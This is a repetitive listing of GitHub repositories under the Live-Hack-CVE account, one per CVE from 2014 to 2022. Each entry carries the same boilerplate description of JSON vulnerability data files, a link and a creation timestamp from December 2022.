**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43980 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43980](https://github.com/Live-Hack-CVE/CVE-2021-43980) create time: 2022-12-23T21:13:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40017 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40017](https://github.com/Live-Hack-CVE/CVE-2021-40017) create time: 2022-12-23T21:13:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36780 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36780](https://github.com/Live-Hack-CVE/CVE-2021-36780) create time: 2022-12-23T21:08:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36779 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36779](https://github.com/Live-Hack-CVE/CVE-2021-36779) create time: 2022-12-23T21:08:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3717 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3717](https://github.com/Live-Hack-CVE/CVE-2021-3717) create time: 2022-12-23T21:06:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3629 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3629](https://github.com/Live-Hack-CVE/CVE-2021-3629) create time: 2022-12-23T21:06:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3597 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3597](https://github.com/Live-Hack-CVE/CVE-2021-3597) create time: 2022-12-23T21:06:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46851 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46851](https://github.com/Live-Hack-CVE/CVE-2021-46851) create time: 2022-12-23T21:04:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46852 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46852](https://github.com/Live-Hack-CVE/CVE-2021-46852) create time: 2022-12-23T21:04:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22737 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22737](https://github.com/Live-Hack-CVE/CVE-2021-22737) create time: 2022-12-23T20:32:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43946 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43946](https://github.com/Live-Hack-CVE/CVE-2021-43946) create time: 2022-12-23T20:30:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40348 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40348](https://github.com/Live-Hack-CVE/CVE-2021-40348) create time: 2022-12-23T20:30:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24930 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24930](https://github.com/Live-Hack-CVE/CVE-2021-24930) create time: 2022-12-23T20:29:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36886 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36886](https://github.com/Live-Hack-CVE/CVE-2021-36886) create time: 2022-12-23T20:28:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36885 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36885](https://github.com/Live-Hack-CVE/CVE-2021-36885) create time: 2022-12-23T20:28:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36369 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36369](https://github.com/Live-Hack-CVE/CVE-2021-36369) create time: 2022-12-23T20:28:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24144 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24144](https://github.com/Live-Hack-CVE/CVE-2021-24144) create time: 2022-12-23T20:27:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32001 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32001](https://github.com/Live-Hack-CVE/CVE-2021-32001) create time: 2022-12-23T20:25:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36783 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36783](https://github.com/Live-Hack-CVE/CVE-2021-36783) create time: 2022-12-23T20:25:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34579 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34579](https://github.com/Live-Hack-CVE/CVE-2021-34579) create time: 2022-12-23T20:22:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34577 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34577](https://github.com/Live-Hack-CVE/CVE-2021-34577) create time: 2022-12-23T20:22:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2880 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2880](https://github.com/Live-Hack-CVE/CVE-2022-2880) create time: 2022-12-23T21:13:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21824 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21824](https://github.com/Live-Hack-CVE/CVE-2022-21824) create time: 2022-12-23T21:13:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20775 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20775](https://github.com/Live-Hack-CVE/CVE-2022-20775) create time: 2022-12-23T21:13:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20812 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20812](https://github.com/Live-Hack-CVE/CVE-2022-20812) create time: 2022-12-23T21:13:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20364 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20364](https://github.com/Live-Hack-CVE/CVE-2022-20364) create time: 2022-12-23T21:13:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36087 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36087](https://github.com/Live-Hack-CVE/CVE-2022-36087) create time: 2022-12-23T21:13:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20231 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20231](https://github.com/Live-Hack-CVE/CVE-2022-20231) create time: 2022-12-23T21:13:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36781 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36781](https://github.com/Live-Hack-CVE/CVE-2022-36781) create time: 2022-12-23T21:13:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2863 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2863](https://github.com/Live-Hack-CVE/CVE-2022-2863) create time: 2022-12-23T21:13:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2781 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2781](https://github.com/Live-Hack-CVE/CVE-2022-2781) create time: 2022-12-23T21:13:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39269 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39269](https://github.com/Live-Hack-CVE/CVE-2022-39269) create time: 2022-12-23T21:13:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39244 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39244](https://github.com/Live-Hack-CVE/CVE-2022-39244) create time: 2022-12-23T21:13:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32849 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32849](https://github.com/Live-Hack-CVE/CVE-2022-32849) create time: 2022-12-23T21:13:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39270 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39270](https://github.com/Live-Hack-CVE/CVE-2022-39270) create time: 2022-12-23T21:13:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3002 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3002](https://github.com/Live-Hack-CVE/CVE-2022-3002) create time: 2022-12-23T21:13:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42075 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42075](https://github.com/Live-Hack-CVE/CVE-2022-42075) create time: 2022-12-23T21:12:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2986 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2986](https://github.com/Live-Hack-CVE/CVE-2022-2986) create time: 2022-12-23T21:12:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39280 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39280](https://github.com/Live-Hack-CVE/CVE-2022-39280) create time: 2022-12-23T21:12:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39800 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39800](https://github.com/Live-Hack-CVE/CVE-2022-39800) create time: 2022-12-23T21:12:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42457 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42457](https://github.com/Live-Hack-CVE/CVE-2022-42457) create time: 2022-12-23T21:11:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41125 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41125](https://github.com/Live-Hack-CVE/CVE-2022-41125) create time: 2022-12-23T21:11:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3489 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3489](https://github.com/Live-Hack-CVE/CVE-2022-3489) create time: 2022-12-23T21:11:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3494 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3494](https://github.com/Live-Hack-CVE/CVE-2022-3494) create time: 2022-12-23T21:11:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3558 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3558](https://github.com/Live-Hack-CVE/CVE-2022-3558) create time: 2022-12-23T21:11:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41123 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41123](https://github.com/Live-Hack-CVE/CVE-2022-41123) create time: 2022-12-23T21:11:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41080 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41080](https://github.com/Live-Hack-CVE/CVE-2022-41080) create time: 2022-12-23T21:11:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44544 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44544](https://github.com/Live-Hack-CVE/CVE-2022-44544) create time: 2022-12-23T21:10:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32588 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32588](https://github.com/Live-Hack-CVE/CVE-2022-32588) create time: 2022-12-23T21:10:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3536 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3536](https://github.com/Live-Hack-CVE/CVE-2022-3536) create time: 2022-12-23T21:10:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32814 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32814](https://github.com/Live-Hack-CVE/CVE-2022-32814) create time: 2022-12-23T21:10:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-4717 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-4717](https://github.com/Live-Hack-CVE/CVE-2014-4717) create time: 2022-12-23T19:51:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0160 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0160](https://github.com/Live-Hack-CVE/CVE-2014-0160) create time: 2022-12-23T19:48:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-20432 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-20432](https://github.com/Live-Hack-CVE/CVE-2018-20432) create time: 2022-12-23T19:43:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19950 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19950](https://github.com/Live-Hack-CVE/CVE-2018-19950) create time: 2022-12-23T19:41:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-0845 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-0845](https://github.com/Live-Hack-CVE/CVE-2019-0845) create time: 2022-12-23T19:51:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-15605 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-15605](https://github.com/Live-Hack-CVE/CVE-2019-15605) create time: 2022-12-23T19:47:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17026 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17026](https://github.com/Live-Hack-CVE/CVE-2019-17026) create time: 2022-12-23T19:47:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-15604 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-15604](https://github.com/Live-Hack-CVE/CVE-2019-15604) create time: 2022-12-23T19:47:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3692 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3692](https://github.com/Live-Hack-CVE/CVE-2019-3692) create time: 2022-12-23T19:47:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14907 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14907](https://github.com/Live-Hack-CVE/CVE-2019-14907) create time: 2022-12-23T19:47:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11823 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11823](https://github.com/Live-Hack-CVE/CVE-2019-11823) create time: 2022-12-23T19:46:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20790 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20790](https://github.com/Live-Hack-CVE/CVE-2019-20790) create time: 2022-12-23T19:46:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18901 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18901](https://github.com/Live-Hack-CVE/CVE-2019-18901) create time: 2022-12-23T19:45:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-15505 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-15505](https://github.com/Live-Hack-CVE/CVE-2019-15505) create time: 2022-12-23T19:43:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11556 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11556](https://github.com/Live-Hack-CVE/CVE-2019-11556) create time: 2022-12-23T19:43:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10804 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10804](https://github.com/Live-Hack-CVE/CVE-2020-10804) create time: 2022-12-23T19:47:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10699 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10699](https://github.com/Live-Hack-CVE/CVE-2020-10699) create time: 2022-12-23T19:46:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1744 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1744](https://github.com/Live-Hack-CVE/CVE-2020-1744) create time: 2022-12-23T19:46:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12137 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12137](https://github.com/Live-Hack-CVE/CVE-2020-12137) create time: 2022-12-23T19:46:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12783 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12783](https://github.com/Live-Hack-CVE/CVE-2020-12783) create time: 2022-12-23T19:46:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10802 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10802](https://github.com/Live-Hack-CVE/CVE-2020-10802) create time: 2022-12-23T19:46:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12272 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12272](https://github.com/Live-Hack-CVE/CVE-2020-12272) create time: 2022-12-23T19:46:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10717 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10717](https://github.com/Live-Hack-CVE/CVE-2020-10717) create time: 2022-12-23T19:46:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13659 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13659](https://github.com/Live-Hack-CVE/CVE-2020-13659) create time: 2022-12-23T19:45:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8555 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8555](https://github.com/Live-Hack-CVE/CVE-2020-8555) create time: 2022-12-23T19:45:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2026 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2026](https://github.com/Live-Hack-CVE/CVE-2020-2026) create time: 2022-12-23T19:45:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10761 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10761](https://github.com/Live-Hack-CVE/CVE-2020-10761) create time: 2022-12-23T19:45:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13249 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13249](https://github.com/Live-Hack-CVE/CVE-2020-13249) create time: 2022-12-23T19:45:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14004 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14004](https://github.com/Live-Hack-CVE/CVE-2020-14004) create time: 2022-12-23T19:45:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12867 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12867](https://github.com/Live-Hack-CVE/CVE-2020-12867) create time: 2022-12-23T19:45:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15395 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15395](https://github.com/Live-Hack-CVE/CVE-2020-15395) create time: 2022-12-23T19:45:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14446 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14446](https://github.com/Live-Hack-CVE/CVE-2020-14446) create time: 2022-12-23T19:45:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14295 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14295](https://github.com/Live-Hack-CVE/CVE-2020-14295) create time: 2022-12-23T19:44:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15902 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15902](https://github.com/Live-Hack-CVE/CVE-2020-15902) create time: 2022-12-23T19:44:55Z

